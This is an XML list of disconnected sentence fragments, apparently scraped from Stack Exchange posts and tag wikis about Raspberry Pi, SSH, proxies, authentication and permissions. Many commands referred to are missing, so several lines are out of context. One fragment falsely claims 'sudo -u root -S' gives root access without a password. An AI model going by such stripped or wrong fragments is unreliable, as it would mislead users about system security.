    <t>I am aware, that this probably prevents new code from beeing uploded, but it should not prevent from the device from shoving up at all.</t>
  </si>
  <si>
    <t>The two questions I have are:
Is it really permission related?</t>
  </si>
  <si>
    <t>The proxy seems to work, because the website asks me for the login and password I configuered within the streamer.</t>
  </si>
  <si>
    <t>I got all the information from Intel official site.</t>
  </si>
  <si>
    <t>Probably it will have worked from your browser because were already logged in.</t>
  </si>
  <si>
    <t>Since you have no ssh access, I can safe you from going on site A once.</t>
  </si>
  <si>
    <t>Have you tried with root privileges?</t>
  </si>
  <si>
    <t>Use this tag for questions about iPhones and other iOS devices which are jailbroken.</t>
  </si>
  <si>
    <t>Tampermonkey scripts are privileged javascript, with access to a custom API, that allows you to customize the way web pages look and act.</t>
  </si>
  <si>
    <t>This tag is poorly named: use the 'ssl' or 'jsse' tags.</t>
  </si>
  <si>
    <t>Paros proxy is for assessing web application vulnerability</t>
  </si>
  <si>
    <t>Firebug Lite is a JavaScript bookmarklet allowing to debug web pages.</t>
  </si>
  <si>
    <t>Questions about SSL/TLS in general should not be tagged polarssl.</t>
  </si>
  <si>
    <t>Questions about OAuth should be tagged oauth.</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/system.web.security.sqlmembershipprovider(v=vs.110).aspx</t>
  </si>
  <si>
    <t>Useful links:
File System Permissions in Wikipedia
Understanding Linux File Permissions, Linux Foundation
Filesystem Security from Brown University</t>
  </si>
  <si>
    <t>Distributed systems like Git tend to be less strict about what is committed, because it is the author who chooses when to push commits to a remote repository and can run test suites before choosing to push their changes; also, any mistakes can be reversed by editing private history.</t>
  </si>
  <si>
    <t>The server needs root privileges, does inittab do this automatically or do I need to add something to it?</t>
  </si>
  <si>
    <t>I am trying to bypass the insecure connection in firefox using selenium in Raspberry pi 2 (Raspbian PIXEL).</t>
  </si>
  <si>
    <t>Your space in the username and password commands are keeping your telnet session from actually logging into the pi bot.</t>
  </si>
  <si>
    <t>So just answering the question
This just copies the X11 authority file directly to root without the xauth command management.</t>
  </si>
  <si>
    <t>JXLoginPane is a component available in SwingX library which provides an internationalized user interface to be used in login-based desktop applications.</t>
  </si>
  <si>
    <t>By default, a StreamWriter is not thread safe
See official documentation from Microsoft.</t>
  </si>
  <si>
    <t>The interceptor stack is composed by referencing other interceptors or interceptor stacks.</t>
  </si>
  <si>
    <t>This tag should be used for questions that specifically pertain to the Intel Fortran, and Intel Visual Fortran compilers, and the latter's predecessor Compaq Visual Fortran.</t>
  </si>
  <si>
    <t>I've helped build the community spam detection bot.</t>
  </si>
  <si>
    <t>Links
The Python Social Auth website
GitHub project page
Documentation</t>
  </si>
  <si>
    <t>My command:
In hostapd.conf:
In dnsmasq.conf:
interface=wlan0
bind-interfaces
server=8.8.8.8
domain-needed
bogus-priv 
dhcp-range=172.24.1.50,172.24.1.150,12h
In sysctl.conf, net.ipv4.ip_forward has set to 1</t>
  </si>
  <si>
    <t>Features
There are four main features in ESI:
inclusion of page fragments, as illustrated above;
variables which can be set from cookies or HTTP headers and then used in other ESI statements or written into markup;
conditions so that different markup can be used based on variables, for example if a cookie is set or not;
error handling, so that a failover can be used if an origin server is unavailable.</t>
  </si>
  <si>
    <t>I am developing a python module/library that will allow a connection to a hivemq broker with a custom version of the file authentication plugin on hivemq's website(www.hivemq.com/plugins).</t>
  </si>
  <si>
    <t>Of course it's an option to just upload two intermidiates and try it out, and I have a gut feeling that this will work, so the question is more like if I'm creating a potential security breach by doing so?</t>
  </si>
  <si>
    <t>The HA profile itself requires certification through the ZigBee Alliance, so you'll find this same issue whether it's a stack or profile.</t>
  </si>
  <si>
    <t>Explanation: It is a permission problem, the RPi interface is trying to use the pi camera at the same time as something else, and that something else has root privileges.</t>
  </si>
  <si>
    <t>The library implements:
local file access (file://)
FTP
HTTP
HTTPS (optional, using OpenSSL)
FTP and HTTP proxies can be used.</t>
  </si>
  <si>
    <t>Useful links
Security component on Github
Security component on Packagist
List of contributors
Official documentation</t>
  </si>
  <si>
    <t>I want to connect to
the general internet
a private network through a pre-configured APN
I don't have a big understanding of networking yet, so any help is appreciated.</t>
  </si>
  <si>
    <t>Many source control systems have an "ignore"-file mechanism that specifies files that should not be committed or tracked in version control.</t>
  </si>
  <si>
    <t>The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.</t>
  </si>
  <si>
    <t>WebServices.dll but was not handled in user code
Additional information: Could not load file or assembly 'System.Core,
Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of 
its dependencies.</t>
  </si>
  <si>
    <t>DragonBoard 410c
Windows 10 IoT Core v.10.0.16273.1000
I SSH into the machine and run  which results in this error:
Unhandled Exception: System.IO.FileLoadException: Could not load file or assembly 'System.Runtime, Version=4.0.21.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one of its dependencies.</t>
  </si>
  <si>
    <t>I can 'login' into PhpMyAdmin.. with the credentials above  root/password...
but I have NO PRIVILEGES to create a database.. or add tables..etc
and when I'm logged into PhpMyAdmin..</t>
  </si>
  <si>
    <t>JaNeLA The Java Network Launch Analyzer is a free-ware tool created by developers to provide validation of launch files and sanity checking
on many other aspects of a JWS launch.</t>
  </si>
  <si>
    <t>client (Win 10 machine in this case) will have to validate this certification, to validate this as trusted, I twill have to look at issuer of this certificate and go up the chain and see if this issuer is in Trusted Root CA.</t>
  </si>
  <si>
    <t>Identification of (level 1) controls that should be selected by default when a main control (at root level) is selected.</t>
  </si>
  <si>
    <t>Without regard to the specific environment semantics, the most general practice for leak prevention is: Remove any reference that is no longer in use.</t>
  </si>
  <si>
    <t>false
        05-31 12:16:17.668: D/onCreate(1631): registered Receiver..
        05-31 12:16:17.668: D/onCreate(1631): Got permission intent...
        05-31 12:16:17.698: D/onResume(1631): Getting device list
        05-31 12:16:17.698: D/onResume(1631): Getting UsbAccessory
        05-31 12:16:17.698: D/showMessage(1631): mAccessory is null, devices:
        05-31 12:16:17.698: D/com.example.signalhello.MainActivity(1631): mAccessory is null
        05-31 12:16:17.728: D/ViewRootImpl(1631): pckname = com.example.signalhello
        05-31 12:16:18.138: I/WindowManager(140): MediaPlayer.is not PlayingVideo
        05-31 12:16:18.738: I/wpa_supplicant(400): [CTRL_IFACE]SIGNAL_POLL
        05-31 12:16:20.068: D/dalvikvm(140): GC_EXPLICIT freed 267K, 24% free 8736K/11399K, paused 8ms+13ms
        05-31 12:16:21.738: I/wpa_supplicant(400): [CTRL_IFACE]SIGNAL_POLL
I'm very confused with my situation with above things.</t>
  </si>
  <si>
    <t>http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle#Links
I would like to make the device so that as soon as it is inserted and installed it sends a password followed by the enter key.</t>
  </si>
  <si>
    <t>While i was trying to port a owin asp.net website to the pi, (raspberry pi model b) I ended up with a website displaying the error page :
Bad Request (Invalid host)
On the pi i am running raspbian wheezy.</t>
  </si>
  <si>
    <t>So I configured  as
And /etc/apache2/mods-enabled/dav_svn.conf
&lt;Location /svn&gt;
  DAV svn
  SVNListParentPath on
  SVNParentPath /media/usbhdd1/db
  AuthType Basic
  AuthName "Repositories"
  AuthUserFile /etc/apache2/dav_svn.passwd
  AuthzSVNAccessFile /etc/apache2/dav_svn.authz
  Require valid-user
&lt;/Location&gt;
There are occurring 2 problems.</t>
  </si>
  <si>
    <t>Unfortunately the Pi still can not ping external sites, such as google.com
Latest Discoveries: 
I am on a corporate box, which has internet sharing disabled by the system admin.</t>
  </si>
  <si>
    <t>2) I generated the certificates and edit my config.yaml
3) I added in Manage computer certificates/Trusted Root Certification Authorities the azure-iot-test-only.root.ca.cert.pem.</t>
  </si>
  <si>
    <t>3) XY Problem -&gt; Why not look at other avenues...The only way to really pop malicious firmware on is with physical access to the device and with a user that has the prior source code (you can set lock bits to prevent reading EEPROM).</t>
  </si>
  <si>
    <t>For questions about scanning/blocking URLs with Windows SmartScreen cloud-based anti-phishing and anti-malware component.</t>
  </si>
  <si>
    <t>Integrated Windows Authentication (IWA) is the automatically authenticated connections between Microsoft Internet Information Services, Internet Explorer, and other Active Directory aware applications.</t>
  </si>
  <si>
    <t>As example, questions regarding Apple policies (why something was rejected or how do they know whether app uses some private API) aren't good fit for this tag.</t>
  </si>
  <si>
    <t>A password-based authentication process (in the common example of OpenSSH) may be vulnerable to brute-force attacks, if no mechanism is in place to detect them.</t>
  </si>
  <si>
    <t>This also simplifies the common arrangement of running the potentially vulnerable parts of a privileged program in a sandbox, in order to pre-emptively contain a security breach.</t>
  </si>
  <si>
    <t>On request from a third-party site, Google authenticates users who are signing in with an existing Google account, and returns to the third-party site an identifier that the site can use to recognize the user.</t>
  </si>
  <si>
    <t>Trivial attacks are easy to prevent by blocking the originating IP address but more advanced attacks may use distributed IP addresses from the whole world.</t>
  </si>
  <si>
    <t>Public Profile and Friend List
The public profile and friend list is the basic information available to an app.</t>
  </si>
  <si>
    <t>As long as your whitelist config only allows safe markup and CSS, even the most malformed or malicious input will be transformed into safe output.</t>
  </si>
  <si>
    <t>Instead of opening up Safari first when a link is clicked, iOS will check if a Universal Link has been registered for the domain associated with the link, then check if the corresponding app is installed.</t>
  </si>
  <si>
    <t>An anxiety with public cloud surrounds the sharing of resources; this type of environment brings security concerns and concerns of governance.</t>
  </si>
  <si>
    <t>But TLS communications on the ESP8266 requires a large chunk of memory, and to avoid man-in-the-middle attacks you really have to verify the server certificate, generally done using an SHA1 fingerprint.</t>
  </si>
  <si>
    <t>Unlike HTTP Basic or Digest authentication, iwa it doesn't prompt the user to input their credentials, instead the browser automatically sends the authentication token for the user currently signed-in Windows user to the web server.</t>
  </si>
  <si>
    <t>In the Watson IoT Platform Extensions page, in the Blockchain tile, I click Setup and fill in Fabric information as per the instruction available here: https://console.ng.bluemix.net/docs/services/IoT/blockchain/dev_blockchain.html#iotblockchain_link
As requested, I noted down following service credentials:
 Peer information: api_host and api_port_tls
 User of type 1 (client) information: username and secret
I also made sure that the user that I select must not be previously registered with a peer other than the peer that I selected.</t>
  </si>
  <si>
    <t>After the device is logged in, then all of those URLs from http probes need to return the expected success message, otherwise it will continue to assume the device is not logged in to the captive portal successfully, and will continue to show the authentication pop-up.</t>
  </si>
  <si>
    <t>On can test identity of two objects using
In java a == b
In python a is b
As an implementation detail, identity hints about potential co-location of objects in physical or virtual memory, and thus may be related to performance.</t>
  </si>
  <si>
    <t>It does not seem like something that should run using root privileges.</t>
  </si>
  <si>
    <t>Once the root password is set, you'll need to be logged in as root (or use ) to login.</t>
  </si>
  <si>
    <t>For example, you may get cant connect to the proxy server error with the browser.</t>
  </si>
  <si>
    <t>Without it docker will run in root privileges.</t>
  </si>
  <si>
    <t>It is a self-contained server that runs as a user without root privileges.</t>
  </si>
  <si>
    <t>GENERAL BITCOIN QUESTIONS CAN BE ASKED ON https://bitcoin.stackexchange.com Bitcoin is a peer-to-peer digital currency with no central authority.</t>
  </si>
  <si>
    <t>The component can handle redirects, authentication, and data retrieval all by itself.</t>
  </si>
  <si>
    <t>Some taglibs also contain tags that can be used for logging or for security (authentication).</t>
  </si>
  <si>
    <t>It's this which you need to add to your trusted domains.</t>
  </si>
  <si>
    <t>What is causing the server to get killed &amp; how can I keep it up running even when I log off SSH?</t>
  </si>
  <si>
    <t>The most relevat page is IMO the page 19 which actually gives the pseudocode example of what I'm trying to do.</t>
  </si>
  <si>
    <t>How can I connect it to the Internet across a firewall proxy?</t>
  </si>
  <si>
    <t>Chose python and pycrypto because the OS comes with python 3.2.3 pre-installed.</t>
  </si>
  <si>
    <t>I'm trying to create a proxy on my Apache2 web server.</t>
  </si>
  <si>
    <t>I can SSH into it and I get the standard Apache 2 placeholder site shown over the browser.</t>
  </si>
  <si>
    <t>I remember getting my iPhone on the network and having to use not only a username and a password, but I had to "accept" a trust certificate.</t>
  </si>
  <si>
    <t>But if I type it as root on a ssh session it runs.</t>
  </si>
  <si>
    <t>This is then used by me to SSH in and by him to get to the web UI via a URL on my domain "/cleres".</t>
  </si>
  <si>
    <t>Is there any Raspberry Pi optimized/specific backtrace() implementation?</t>
  </si>
  <si>
    <t>I'm trying on code related to ultrasonic sensor.</t>
  </si>
  <si>
    <t>My basic questions are,
How to register an Application with AWS IoT?</t>
  </si>
  <si>
    <t>The server is reachable publicly over the internet.</t>
  </si>
  <si>
    <t>I know the raspberry pi connects to the website because it gets information about my browser.</t>
  </si>
  <si>
    <t>Mar  2 22:12:23 raspberrypi systemd[711]: Listening on GnuPG cryptographic agent (access for web browsers).</t>
  </si>
  <si>
    <t>I get this error:
in the cPanel information section I have filled in my cpanel username, password and domain in my file (not this one).</t>
  </si>
  <si>
    <t>In other words, completely safe.</t>
  </si>
  <si>
    <t>How to prevent NFC tag cloning?</t>
  </si>
  <si>
    <t>Actually you could do this with a memory watcher ( just like CheatEngine ), but there is chances you'll be banned for using this.</t>
  </si>
  <si>
    <t>The problem is most likely related to the permissions of your web server.</t>
  </si>
  <si>
    <t>You'll just have to change the default password to a new one using this command
Files and DB will only be served through webserver.</t>
  </si>
  <si>
    <t>Or at last you could use a reverse proxy from cloud or a VPN network.</t>
  </si>
  <si>
    <t>Click on "Certificate", then expand "Details" in the view of the certificate.</t>
  </si>
  <si>
    <t>If you are accessing all those devices on the same network, you can use a reverse proxy or a VPN for external access into your network and those devices.</t>
  </si>
  <si>
    <t>Of course, once your RPi is connected to your iPhone's hotspot, it can FTP or ssh copy the image to any website or other server on the Internet it has access to itself.</t>
  </si>
  <si>
    <t>That may have sufficient memory to log in.</t>
  </si>
  <si>
    <t>For possible bugs that are specific to the Safari browser from Apple.</t>
  </si>
  <si>
    <t>The `smart-client` tag is a synonym for tag `smartclient` and should not be used.</t>
  </si>
  <si>
    <t>A rooted device is one on which root access has been gained.</t>
  </si>
  <si>
    <t>Discussion of the appropriate design of URLs (e.g., for readability and hackability).</t>
  </si>
  <si>
    <t>It is available in OS X v10.2 with Safari 1.0 installed,  available in OS X v10.2.7 and later This tag should be used only on questions that are about NSURLDownload.</t>
  </si>
  <si>
    <t>Cross-site means the interaction cross separate domains of authority.</t>
  </si>
  <si>
    <t>A secret key to access a site or log into a system.</t>
  </si>
  <si>
    <t>DNSSEC QUESTIONS MUST BE PROGRAMMING RELATED.</t>
  </si>
  <si>
    <t>WPScan is a black box WordPress vulnerability scanner.</t>
  </si>
  <si>
    <t>This tag does not imply the motivation behind nor the root cause of the invisibility and none should be inferred.</t>
  </si>
  <si>
    <t>Please use [ms-access] for Microsoft Access questions, or [authorization] for security access questions.</t>
  </si>
  <si>
    <t>questions about using the compromise nlp library</t>
  </si>
  <si>
    <t>Use this tag for Azure Security questions</t>
  </si>
  <si>
    <t>Oracle Native Network Encryption related questions</t>
  </si>
  <si>
    <t>You can choose the charset the ID3 tags are encoded in from within gtkpod.</t>
  </si>
  <si>
    <t>Should be linked to the email tag as a synonym.</t>
  </si>
  <si>
    <t>With all these said, having a licensing scheme on your application does not mean you are completely safe.</t>
  </si>
  <si>
    <t>The reputation system is designed to allow the websites to be self-moderating.</t>
  </si>
  <si>
    <t>This tag should be used for questions about writing Java software which uses the Google OAuth Client Library for Java, for either OAuth 1.0a or OAuth 2.0.</t>
  </si>
  <si>
    <t>[7] It was soon posted on the sci.crypt newsgroup, and from there to many sites on the Internet.</t>
  </si>
  <si>
    <t>I think you should feel pretty safe using it.</t>
  </si>
  <si>
    <t>Do not use this tag, there are various tags for Microsoft Access, the most common being ms-access.</t>
  </si>
  <si>
    <t>This assures the user that the bank's web site is authentic.</t>
  </si>
  <si>
    <t>Questions with this tag should be about programmatically accessing the key and validating users, not about the device itself.</t>
  </si>
  <si>
    <t>Useful links
Wikipedia entry about OAuth</t>
  </si>
  <si>
    <t>An answer to a stackoverflow question asking for the differences between OAuth 1.0 and 2.0.</t>
  </si>
  <si>
    <t>a library independent of the old PyCrypto.</t>
  </si>
  <si>
    <t>The technical term "IEEE 802.11" has been used interchangeably with Wi-Fi, but over the past few years Wi-Fi has become a superset of IEEE 802.11.</t>
  </si>
  <si>
    <t>What are the Safe Browsing APIs?</t>
  </si>
  <si>
    <t>The official website of bitcoin is Bitcoin.org
There's also a Bitcoin StackExchange site that's dedicated to Bitcoin.</t>
  </si>
  <si>
    <t>These details I will be intending to write to an onboard sd card so that the wifi module will be able to logon to the network that the ssid and network key are relevant too.</t>
  </si>
  <si>
    <t>how to handle the code correctly so the captive gets bypassed.</t>
  </si>
  <si>
    <t>I've tried deleting and recreating the log file, giving it all possible permissions, deleting and recreating 00-samba.audit.conf, nothing works.</t>
  </si>
  <si>
    <t>For most users, Sleuth should be invisible, and all your interactions with external systems should be instrumented automatically.</t>
  </si>
  <si>
    <t>While jailbreaking your device is generally regarded as being a safe practice, it is not for the faint of heart.</t>
  </si>
  <si>
    <t>CAN'T GET PAST HERE ERROR BELOW
Error: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a
  future version.</t>
  </si>
  <si>
    <t>This just makes sense.. Unix won't allow privileges to be elevated in this manner.</t>
  </si>
  <si>
    <t>Questions related to the "IBM Cloud private" offering.</t>
  </si>
  <si>
    <t>I suggest you do the request with the browser, intercept the traffic with wireshark and see how it's done.</t>
  </si>
  <si>
    <t>Most routers will display this information if you log into their web interfaces.</t>
  </si>
  <si>
    <t>It can run off a USB flash drive, comes with a pre-configured web browser (Firefox-based) to protect your anonymity, and is self-contained.</t>
  </si>
  <si>
    <t>Rooting is the process of attaining privileged control (known as "root access") on a UNIX based device.</t>
  </si>
  <si>
    <t>They are currently being logged with the format: _$MONTH$DAY$YEAR.log, with ROUTER or FIREWALL as the device.</t>
  </si>
  <si>
    <t>Security is a very hard thing to implement correctly however, and so you may want to look around if someone has already implemented a library like this for Bluetooth.</t>
  </si>
  <si>
    <t>There are a lot of security tricks to keep you tokens safe, this one I suggested, is very basic security, but you can do it easily just on flight.</t>
  </si>
  <si>
    <t>Applets that are signed by a certificate from a recognized certificate authority can either run only in the sandbox, or can request permission to run outside the sandbox.</t>
  </si>
  <si>
    <t>Wi-Fi is used by over 700 million people, there are over 750,000 hotspots (places with Wi-Fi Internet connectivity) around the world, and about 800 million new Wi-Fi devices every year.</t>
  </si>
  <si>
    <t>I was reading Run/Debug as root in PyCharm, but I was wondering if it is possible to setup the active pyenv interpreter to automatically execute  with root privileges?</t>
  </si>
  <si>
    <t>A python class which encapsulates a connection to a POP3/POP3_SSL server and implements protocol as defined in RFC 1725.</t>
  </si>
  <si>
    <t>An ETag is an opaque identifier assigned by a web server to a specific version of a resource found at a URL.</t>
  </si>
  <si>
    <t>So :
after a reinstallation of Jessie with a recent version to be sure all is clean
as usual
go to Advanced options : Would you like a login shell to be accessible over serial?</t>
  </si>
  <si>
    <t>I don't care much about my reputation now, so I have no problems in downvoting spam, offensive, or otherwise unsalvageable content that others simply leave to be deleted.</t>
  </si>
  <si>
    <t>Most locked questions have (or should have been) migrated to programmers.stackexchange.com, locking of answers has mostly been used for censorship by administrators.)</t>
  </si>
  <si>
    <t>In the meanwhile, the same raspberry pi is hosting a backend website on Apache 2 server for the administrator to change preferences by logging in on local LAN.</t>
  </si>
  <si>
    <t>Note: Make sure that you are logged into the Azure portal with the same account that you use for Power BI when you click Authorize.</t>
  </si>
  <si>
    <t>But it's pointless to offer a choice to your users, for if you want to protect them from usage errors then you cannot rely on them to choose the "safe" versions of your functions.</t>
  </si>
  <si>
    <t>Links:
ClientLogin Documentation
Changes to deprecation polices and API spring cleaning
Migration to Time table</t>
  </si>
  <si>
    <t>Turns out it was just insanely slow..
Had it running for about 2 hours and it finally finished and prompted me to the login page where I was able to login and finally use my ownCloud.</t>
  </si>
  <si>
    <t>A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.</t>
  </si>
  <si>
    <t>I'm forwarding port 80 so that I can access the media center interface when i'm away from home for management, but would like to get it set up so i can access the deluge-web ui without having to forward its port, so that i can implement a stricter security control using mysql or php with apache.</t>
  </si>
  <si>
    <t>Parallels Plesk Panel allows a server administrator to set up new websites, reseller accounts, e-mail accounts, and DNS entries through a web-based interface.</t>
  </si>
  <si>
    <t>I'll start off with my questions since they are general and give some background below...
My questions:
Is there a way to protect the SD card from being corrupted from unexpected power loss?</t>
  </si>
  <si>
    <t>This works however:
And yes, I already setted the missing caps described in this thread: https://unix.stackexchange.com/questions/96106/bluetooth-le-scan-as-non-root
Because of the setted capabilities, this also works as it should (returns a list of detected devices, killed gracefully after 5 seconds:
$ timeout -s SIGINT 5s hcitool -i hci0 lescan
What am I doing wrong?</t>
  </si>
  <si>
    <t>So here is my question:
How can I turn a GPIO pin to high when a specific class is detected, lets say the specific class is 'person', and I want pin 11 to be high, how do I do it?</t>
  </si>
  <si>
    <t>While you know that the  enum members are sequential numeric values, to rely upon inside information of a third-party library (or even your own library) to infer that a cast of an integer to an enum is valid or safe is not best practice.</t>
  </si>
  <si>
    <t>For the SSH part though, see this quick read: http://www.vdomck.org/2005/11/reversing-ssh-connection.html
I am assuming in your case the Pi would be the 'firewalled' device and the company webserver the 'gateway' of sorts.</t>
  </si>
  <si>
    <t>An important aspect of creating ASP.NET Web pages for user input is to be able to check that the information users enter is valid.</t>
  </si>
  <si>
    <t>In the code, Web References are generated proxy-classes that locally represent the exposed functionality (methods) of a Web resource.</t>
  </si>
  <si>
    <t>SQL injection is a type of computer security vulnerability found in applications with SQL databases that enables attackers to inject malicious SQL commands into the database from the user input.</t>
  </si>
  <si>
    <t>External links
Ruby on Rails Security Guide  Mass Assignment
The Ruby/GitHub hack: translated
Mass assignment in Rails applications
Mass Assignment Vulnerability in ASP.NET MVC</t>
  </si>
  <si>
    <t>In most cases publishing is not just the fact of making something publicly available, but also  involves steps like testing/proof reading it, tagging it in some kind of version control.</t>
  </si>
  <si>
    <t>Developed by manast
Install
Example
You can programmatically register or unregister routes dynamically even if the proxy is already running:
About HTTPS
The HTTPS proxy supports virtual hosts by using SNI (which most modern browsers support: IE7 and above).</t>
  </si>
  <si>
    <t>Links
Documentation
Releases
Project Homepage
ZooKeeper Client Bindings
GitHub
Chubby whitepaper - The Chubby lock service for loosely-coupled distributed systems
Related Tags
apache-curator - Java Client Library for ZooKeeper
apache-flink
hadoop
apache-kafka
apache-storm
etcd - a distributed key value store similar to ZooKeeper
netflix-exhibitor - supervisor system for ZooKeeper with a UI for browsing ZK nodes
php-zookeeper
solrcloud</t>
  </si>
  <si>
    <t>Is there anyway to get the python program to run automatically just after the pi has logged itself in, so you would effectively see the pi startup as normal, and the normal desktop start to load but then a split second later the script would begin and (as it is a pygame based python GUI) the desktop would then be covered over by it.</t>
  </si>
  <si>
    <t>In the context of operating system users:
A limited account has basic permissions on a computer, which allows to do basic things for day-to-day use, such as sending emails, writing documents, and browsing the internet.</t>
  </si>
  <si>
    <t>Instead of logging into the csv file Can I log these values directily to a postresql database say Db1 with username 'abc' and password 'xyz'.</t>
  </si>
  <si>
    <t>Actually this is what I see after I login to the site.</t>
  </si>
  <si>
    <t>I developed an app on raspberry pi arm device to scrape data from web interface.</t>
  </si>
  <si>
    <t>Here is my code for deleting a wifi profile</t>
  </si>
  <si>
    <t>/dev/ttyUSB0 running with user root, if your using apache try chown /dev/ttyUSB0 to apache or user is logged in.</t>
  </si>
  <si>
    <t xml:space="preserve">
Instead of logging into the csv file Can I log these values directily to a postresql database say Db1 with username 'abc' and password 'xyz'.</t>
  </si>
  <si>
    <t>Ion Auth is a user library for CodeIgniter.</t>
  </si>
  <si>
    <t>I think this is because it uses SpiDev which usually requires root privileges.</t>
  </si>
  <si>
    <t>#!/bin/bash
while true; do
echo "hello"
done
I run a Raspberry PI 3, Raspian OS with root privileges.</t>
  </si>
  <si>
    <t>My API-Link is something like this: 
And it needs a User and Password:
I tried to read all the BASIC-Auth examples in internet.</t>
  </si>
  <si>
    <t>Another possibility is that the web server is running as a different user as yourself when you are logged (probably as nouser).</t>
  </si>
  <si>
    <t>such as
*sudo -u root -S  is a command for using root permission with no root password required :D</t>
  </si>
  <si>
    <t>The file .config/lxsession/LXDE/autostart is used to start applications without root privileges.</t>
  </si>
  <si>
    <t>It's because  runs commands a root user instead of your normal user.</t>
  </si>
  <si>
    <t>If the user running the xpdf is the same user as the one who's logged into the X session, then you simply need to tell xpdf where to connect it's UI to.</t>
  </si>
  <si>
    <t>Nevermind a reliable, quick, and safe one.</t>
  </si>
  <si>
    <t>If you are not running your code with root privileges you will probably then get a PermissionError due to the access permissions on the /dev/uinput device file.</t>
  </si>
  <si>
    <t>`SafariDriver` is implemented as a Safari browser extension.</t>
  </si>
  <si>
    <t>Use when asking questions regarding the AlecrimCoreData framework.</t>
  </si>
  <si>
    <t>For questions specific to the Captcha recognition service named "2Captcha".</t>
  </si>
  <si>
    <t>It is coded using strict PHP5 OOP principles.</t>
  </si>
  <si>
    <t>These prevent the most serious snooping such as key logging and taking screenshots.</t>
  </si>
  <si>
    <t>The forms authentication ticket is usually contained inside a cookie.</t>
  </si>
  <si>
    <t>Use rooted-device if your question is not about the user, but simply about a device that has been rooted.</t>
  </si>
  <si>
    <t>I killed the X server from the SSH session, and the video re-appeared with the remnants of the boot sequence and the console login prompt.</t>
  </si>
  <si>
    <t>I have to use a http proxy now, but where can I configure the proxy?</t>
  </si>
  <si>
    <t>I connect my PI to laptop normally, I can ping it, I can find it on the web browser, but I can't connect as SSH.</t>
  </si>
  <si>
    <t>But, if I try to access http/https from outside of my local network, I get:
"You are accessing the server from an untrusted domain.</t>
  </si>
  <si>
    <t>I suspect that this behaviour has something to do with Class Library not having manifest file and therefore not having appropriate permissions.</t>
  </si>
  <si>
    <t>I'm running a J2SE application that is somewhat trusted (Minecraft) but will likely contain completely un-trusted (and likely even some hostile) plugins.</t>
  </si>
  <si>
    <t>Then I tried to configure a proxy on my browser to allow all my requests to pass through my application.</t>
  </si>
  <si>
    <t>I'm using it as a captive portal and I just want to log in a txt file data from a username - password form.</t>
  </si>
  <si>
    <t>My coovachilli is working with an IP and when i connect, i am redirected to login page (http://10.10.10.1:4990...) As i told, it is working fine.</t>
  </si>
  <si>
    <t>I can view the video playback in my web browser without any latency that proves that my raspberry pi and network are innocent.</t>
  </si>
  <si>
    <t>So instead I wrote the whole details at
http://azuregeon.blogspot.in/2017/10/azure-iot-c-certificate-connectivity.html
if anyone gets a chance please have a look.</t>
  </si>
  <si>
    <t>: the web browser is launched and log-in is requested, after which the redirect uri is called and the authentication code is fetched.</t>
  </si>
  <si>
    <t>I have created app where I have added webview and redirected to Gmail login page.</t>
  </si>
  <si>
    <t>GCC did not complain about it and I think it should be safe but want to make sure I am not leaving any details.</t>
  </si>
  <si>
    <t>Even though I would suspect it would be an issue here, I have tried a few different pins just to be safe.</t>
  </si>
  <si>
    <t>Because of the new GDPR I have to make the Raspberry Pis completely safe.</t>
  </si>
  <si>
    <t>Also on OMV you can see that the eth0 speed is labeled as 100Mbits/sec
I'm using a WD My Passport 2TB for the storage BTW.</t>
  </si>
  <si>
    <t>I am trying and failing to covert a sketch into a library.</t>
  </si>
  <si>
    <t>I'm doing this 'project' on the official raspberry pi site where I learn to encrypt messages using Python.</t>
  </si>
  <si>
    <t>Then we select SSID and fill password and connect with network.</t>
  </si>
  <si>
    <t>I followed all the procedures as well as on the official Intel home page.</t>
  </si>
  <si>
    <t>In connection details, I selected Authentication as "API Key".</t>
  </si>
  <si>
    <t>I am creating a web page for wifi login credentials.</t>
  </si>
  <si>
    <t>I have used ArduinoOTA to implement basic authentication and Now I need a way to implement password reset in the program.</t>
  </si>
  <si>
    <t>I'm not sure what you consider being your "session id", but I think you're using it more like an API key to identify your device towards the web service.</t>
  </si>
  <si>
    <t>You can get the documents free from their site for a registration.</t>
  </si>
  <si>
    <t>FTP (check this link for more info)
On the device itself (so you bassicly create your scripts on the Pi itself by connecting to it using SSH) like they explain in your link.</t>
  </si>
  <si>
    <t>You can run this process in the background with elevated privileges.</t>
  </si>
  <si>
    <t>If this is still not working, then you may try to execute JavaME runtime with elevated privileges:
sudo ./runSuite.sh &lt;yourapp&gt;
If this is working, there is a permission problem somewhere.</t>
  </si>
  <si>
    <t>See https://developers.google.com/drive/web/auth/web-server</t>
  </si>
  <si>
    <t>these URLs work
https://&lt;username&gt;:&lt;password&gt;@&lt;company&gt;.jira.com/secure/RapidBoard.jspa?os_authType=basic&amp;rapidView=&lt;id&gt;&amp;view=detail</t>
  </si>
  <si>
    <t>Take a look at this link, it explains how Access-Control-Allow-Origin works.</t>
  </si>
  <si>
    <t>Chances are your Apache Server does not have sufficient permissions to execute the command.</t>
  </si>
  <si>
    <t>When you run the command , it first executes sudo echo 4 which runs echo with elevated privileges (which is kind of pointless).</t>
  </si>
  <si>
    <t>There are a few pre programmed keys in the linked github library that will authenticate the cards.</t>
  </si>
  <si>
    <t>That means that as soon as you leave the safe Eclipse haven those links are gone.</t>
  </si>
  <si>
    <t>Click the reset button and try again)
When the light starts breathing magenta, you are in safe mode.</t>
  </si>
  <si>
    <t>You will need to boot into safe mode, modify the system, and reboot into normal mode.</t>
  </si>
  <si>
    <t>About generating SAS token you can utilize Device Explorer.</t>
  </si>
  <si>
    <t>Is there is a chance someone regenerated the key from the Shared Access Policy or via PowerShell?</t>
  </si>
  <si>
    <t>As far as you questions are concerned: 
Key cycling is not enforced by default.</t>
  </si>
  <si>
    <t>I recomend you to start with basic instalation of KODI a then you can learn some other things like ssh your pi over in internet, etc.</t>
  </si>
  <si>
    <t>When the user selects one network, make the page ask for a password (I shall not provide code for this, since there are literally millions of ways of doing this).</t>
  </si>
  <si>
    <t>Yes - as earlier mentioned you need elevated privileges.</t>
  </si>
  <si>
    <t>Being a consumer device, such details may not be available other than by reverse engineering.</t>
  </si>
  <si>
    <t>Remember to install the module u must have an INTERNET connection.</t>
  </si>
  <si>
